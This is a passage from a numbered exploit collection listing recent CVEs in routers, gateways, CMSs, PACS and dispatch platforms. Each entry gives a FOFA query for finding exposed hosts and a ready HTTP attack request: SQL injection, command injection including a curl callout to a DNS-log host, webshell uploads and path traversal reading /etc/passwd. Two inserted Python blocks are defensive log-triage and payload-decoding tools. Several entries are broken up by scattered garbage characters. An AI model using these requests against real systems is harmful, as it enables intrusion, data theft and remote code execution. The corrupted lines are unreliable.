Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

Error-based: the database version comes back inside the XPATH syntax error message produced by updatexml().

135. Netentsec NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected versions: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

' f. U: A1 I+ ?2 H138. 福建科立讯通信指挥调度平台pwd_update.php sql注入$ ~- @' n( H$ r, u2 Z' _
CVE-2024-2621
  i0 W" K' p3 O; }; PFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 k4 r# T8 k2 i! R: }' M
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
* o4 K6 Q. x$ H9 L9 r9 GHost: x.x.x.x2 l6 M7 L1 `; V3 t6 D* C  k& {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
; n. S1 M  `4 Z. W5 y& T3 `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 p% O* c5 \- ^% q/ Z1 G* F2 G8 j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, k* Y; Z' x- S- S% `# xAccept-Encoding: gzip, deflate, br
! X" M- ]5 v3 M7 s7 Z. n, _  lConnection: close/ z7 t+ z2 \4 D
Upgrade-Insecure-Requests: 16 v( Y; ]+ B  _/ D# p! Q, ~
0 n$ @! g! _+ @8 J0 k0 ?

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun communication command and dispatch platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
Credentials: admin/admin

- D3 g! t1 D2 `. P9 l9 K) D5 K143. Netis WF2780 v2.1.40144 远程命令执行% Z, r2 Q0 d, a) J2 W/ |/ ^
CVE-2024-25850
  t, t. u% m+ O5 w( r' O& cFOFA:title='AP setup' && header='netis'
$ b, o+ r2 R1 W% x  G' u) N# R# l2 HPAYLOAD
3 ~  [  p7 Y- K, X; S: x' k
144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= is id); passwd is base64 as well, with the padding omitted (YWJjMTIzNDVjYmE decodes to abc12345cba).
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog address>`;
Accept-Encoding: gzip

The cookie value becomes a file name under the telemetry directory; the embedded command runs later, when the device telemetry job processes that file, so the result shows up in the DNS log rather than in the HTTP response.

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

url=cnRzcDovL2EK is base64 for rtsp://a; transport decodes to || (echo '[S]'; id; echo '[E]')#; so the command output appears between the [S] and [E] markers in the response.

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass via server-side template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

The ;swagger-ui/ matrix parameter makes the path look whitelisted to the authentication filter while the controller still dispatches to /dataSetParam/verification; validationRules is evaluated as server-side JavaScript with access to Java classes. This payload targets Windows (ipconfig).

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

Same request as entry 149 with a Linux command (id).

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

The request as given only shows the unauthenticated access to pageList through the ;swagger-ui/ trick; the injected parameter itself is not included here.
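Several entries on this page get past an authentication or static-file layer with the same two URL tricks: a matrix parameter (the `;.jsp` of entry 132 and the `;swagger-ui/` of entries 149 to 151) that the access filter sees but the dispatcher strips, and dot segments (entries 126, 147, CVE-2024-27199, and the file_name parameter of entry 129) that the filter does not collapse. The following is an added example, not part of this page or of any of the affected products: a triage pass over web access logs that flags both patterns and reports the path the server would actually resolve. The log lines are constructed in combined log format; the parsing regex, function names and the exact flag wording are assumptions made here. It only works on logs that record the request line as the client sent it, before any server-side normalization.

```python
"""Added example (not from the page or any listed product): access-log triage for
the matrix-parameter and dot-segment tricks of entries 126, 129, 132, 147, 149-151.
SAMPLE_LOG is constructed; function names and flag wording are assumptions."""
import posixpath
import re
from urllib.parse import unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_path(path: str) -> str:
    """Percent-decode twice so that %252e%252e is also seen as '..'."""
    return unquote(unquote(path))


def effective_path(target: str) -> str:
    """The resource a servlet container resolves: matrix parameters (';...')
    stripped from every segment, dot segments collapsed."""
    segments = [seg.split(";", 1)[0] for seg in decode_path(urlsplit(target).path).split("/")]
    joined = "/" + "/".join(seg for seg in segments if seg)
    return posixpath.normpath(joined)


def findings(target: str) -> list:
    """Reasons a request target matches one of the page's bypass patterns."""
    url = urlsplit(target)
    path = decode_path(url.path)
    reasons = []
    if ";" in path:
        reasons.append("matrix parameter in path")           # ;swagger-ui/ (149-151)
    if ".." in path.split("/"):
        reasons.append("dot-dot segment in path")            # 126, 147, CVE-2024-27199
    for pair in url.query.split("&") if url.query else []:
        key, _, value = pair.partition("=")
        value = decode_path(value)
        if value.startswith("/") and ";" in value:
            reasons.append(f"path-like query value with matrix parameter ({key})")  # jsp=...;.jsp (132)
        if ".." in value.split("/"):
            reasons.append(f"dot-dot segment in query value ({key})")               # file_name=../ (129)
    return reasons


def triage(lines) -> list:
    """Parse each log line and keep those with findings:
    (client ip, request target, effective path, reasons)."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = findings(m["target"])
        if reasons:
            hits.append((m["ip"], m["target"], effective_path(m["target"]), reasons))
    return hits


# Constructed lines modelled on the page's requests, plus two benign lines that must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Mar/2024:10:00:01 +0000] "POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1" 200 512
203.0.113.5 - - [01/Mar/2024:10:00:02 +0000] "GET /res/../admin/diagnostic.jsp HTTP/1.1" 200 9001
198.51.100.7 - - [01/Mar/2024:10:01:00 +0000] "GET /static/../../../../../etc/passwd HTTP/1.1" 200 1432
198.51.100.7 - - [01/Mar/2024:10:01:30 +0000] "POST /dataSetParam/verification;swagger-ui/ HTTP/1.1" 200 220
198.51.100.7 - - [01/Mar/2024:10:01:31 +0000] "GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1" 200 3100
192.0.2.9 - - [01/Mar/2024:10:02:00 +0000] "GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1" 200 2000
192.0.2.9 - - [01/Mar/2024:10:02:05 +0000] "GET /webeditor/..%2F..%2F..%2Fwindows/win.ini HTTP/1.1" 200 400
192.0.2.10 - - [01/Mar/2024:10:03:00 +0000] "GET /static/app.js HTTP/1.1" 200 5000
192.0.2.10 - - [01/Mar/2024:10:03:01 +0000] "GET /search?q=a;b HTTP/1.1" 200 120
"""

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG.splitlines()):
        print(hit)
```

Seven of the nine lines are flagged; the plain static-file request and the `;` inside an ordinary query value are not, because the rule for query values requires a path-like value. The effective path column is what to compare against the server's protected URL list: `/res/../admin/diagnostic.jsp` resolves to `/admin/diagnostic.jsp`, and `/;swagger-ui/dataSource/pageList` to `/dataSource/pageList`.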
152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected versions:
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, i.e. the injected command travels in the Basic auth username.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip
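Entries 122, 144, 146 and 152 hide the real payload behind an encoding layer: base64 in a query parameter (sql=, system=, url=), base64 with its padding dropped (passwd= in entry 144), percent-encoding (transport= in entry 146), or base64 inside the Basic auth header (entry 152). Anyone grepping proxy or WAF logs for `SLEEP` or `;ls` will miss all four. The following is an added example, not code from this page or from any of the affected products: a decoder that parses a raw request, recovers the text behind each of those encodings, and flags the fields that contain shell or SQL syntax. The requests are the page's own, trimmed to the relevant headers; the function names and the keyword list are assumptions made here.

```python
"""Added example (not from the page or any listed product): recover the encoded
payloads of entries 122, 144, 146 and 152 from raw requests. Requests below are
the page's own, trimmed; function names and SUSPECT keyword list are assumptions."""
import base64
import binascii
import re
from urllib.parse import unquote_plus, urlsplit

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
# Shell metacharacters, SQL keywords, and common first-command names.
SUSPECT = re.compile(r"(;|\|\||`|\$\(|\b(select|union|sleep|updatexml|extractvalue)\b|(^|\s)(id|whoami|uname|ls|cat|curl|wget)\b)", re.I)


def b64_text(value: str):
    """Decode base64 that may lack padding (entry 144's passwd= does).
    Returns printable text, or None when the value is not base64 text."""
    if len(value) < 4 or len(value) % 4 == 1 or not B64_RE.match(value):
        return None
    padded = value + "=" * (-len(value) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.replace("\r", "").replace("\n", "").replace("\t", "").isprintable() else None


def parse_request(raw: str):
    """Split a raw HTTP request into (method, target, headers)."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def decode_request(raw: str) -> list:
    """(location, wire value, decoded text) for every query parameter and for the
    Basic-auth user and password. Base64 is tried on the wire value first;
    anything else is percent-decoded."""
    _method, target, headers = parse_request(raw)
    out = []
    query = urlsplit(target).query
    for pair in query.split("&") if query else []:
        key, _, value = pair.partition("=")
        decoded = b64_text(value)
        out.append((f"query:{key}", value, decoded if decoded is not None else unquote_plus(value)))
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        token = auth[6:].strip()
        creds = b64_text(token)
        if creds is not None:
            user, _, password = creds.partition(":")
            out.append(("basic-auth:user", token, user))
            out.append(("basic-auth:password", token, password))
    return out


def flag_payloads(raw: str) -> list:
    """Keep only the fields whose decoded text carries shell or SQL syntax."""
    return [(loc, text) for loc, _, text in decode_request(raw) if SUSPECT.search(text)]


# The page's requests for entries 122, 144, 146 and 152, trimmed to the relevant headers.
REQ_S200 = ("GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1\r\n"
            "Host: x.x.x.x\r\n\r\n")
REQ_DLINK = ("GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1\r\n"
             "Host: x.x.x.x\r\n\r\n")
REQ_MAJORDOMO = ("GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1"
                 "&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1\r\n"
                 "Host: x.x.x.x\r\n\r\n")
REQ_KEMP = ("GET /access/set?param=enableapi&value=1 HTTP/1.1\r\n"
            "Host: x.x.x.x\r\n"
            "Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=\r\n\r\n")

if __name__ == "__main__":
    for req in (REQ_S200, REQ_DLINK, REQ_MAJORDOMO, REQ_KEMP):
        print(flag_payloads(req))
```

The length-mod-4 check and the padding repair are what make the unpadded D-Link passwd= decode; a plain base64 decoder raises on it. Values that are base64-shaped but decode to non-text (user=mydlinkBRionyg, type=exportexcelbysql) fall through to percent-decoding, so ordinary parameters are never mangled. The command-name list is the noisiest part: tune it to the environment before running it over production logs.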

- Y2 s6 s1 G% J* ?/ D153. gradio任意文件读取8 J+ j- ^  ~) L" ?) a# K9 I5 H/ @
CVE-2024-1561FOFA:body="__gradio_mode__"
* ]( i8 T) Z: C9 j$ C第一步,请求/config文件获取componets的id
  v, b# K3 C5 K( |( s4 mhttp://x.x.x.x/config* W- L, Z3 G4 N. y% D# i
) f" f/ J/ B+ T+ C. G# M2 @" n
; v$ R7 q2 D) x; U+ \
第二步,将/etc/passwd的内容写入到一个临时文件" A* L# T$ Z& M0 w9 Q* v
POST /component_server HTTP/1.16 E9 M' R+ |0 E  N/ H; M7 }0 p: ~) P
Host: x.x.x.x
3 |( m. q" y/ ^3 h7 w% p9 [; zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3" E" N$ h5 O% y( a
Connection: close
. \# q1 F+ F4 FContent-Length: 115
! l( B" M' v- s3 PContent-Type: application/json! j/ G$ E, S" l9 M% b% A% x: q  U
Accept-Encoding: gzip
) m# ?$ K% n6 z7 [- ^, g9 S$ D3 }8 o1 _3 ]$ x  U3 _
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
% V+ @+ o( K) \8 u0 W4 k& K; W  F4 e4 m: \) I1 Q' ?
9 C; a- q1 }0 H
第三步访问
6 ]8 u# a( I/ b8 F# m9 b; r" Ehttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
% |9 X, O* v( N( X* X9 Y/ f0 M- _

, a$ u* @: a9 J$ C154. 天维尔消防救援作战调度平台 SQL注入
* n. g6 {# h: Z) jCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
: S& @! Y# W, g' l# TPOST /twms-service-mfs/mfsNotice/page HTTP/1.15 ~, P7 m' E% s8 ?: ^. e, g8 v9 K: [
Host: x.x.x.x# w+ M: l* L; O( c$ e. }# u
Content-Length: 106" u+ M4 r! W7 g! N$ \" |
Cache-Control: max-age=0& J' m, i* l. q; @7 M
Upgrade-Insecure-Requests: 1
( W4 V* t1 E, X. o* Z; R0 h7 c9 kOrigin: http://x.x.x.x
9 h" H% T$ @/ z& m# w) m7 JContent-Type: application/json
1 |  Q9 Z  P# W9 n  DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
2 @# j. ^0 q( ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  j& Z* X- X: w; r, {) s
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
. D% N6 B# c- R4 eAccept-Encoding: gzip, deflate
/ O! j2 ?5 F3 \, w6 hAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
! b% q$ ?% @/ e0 Q; d& rConnection: close: ?- ^/ G' S6 D! ]4 Z8 V3 b) f
% I' r. f2 s( W3 L
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}* S  s6 B1 i# ^7 ~$ m' f, N. E

8 u( r* A0 B1 _! a- b8 w) W. T! c
155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Visit the file path echoed back in the response, e.g. http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) PACS WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully-intelligent parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field specifies the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
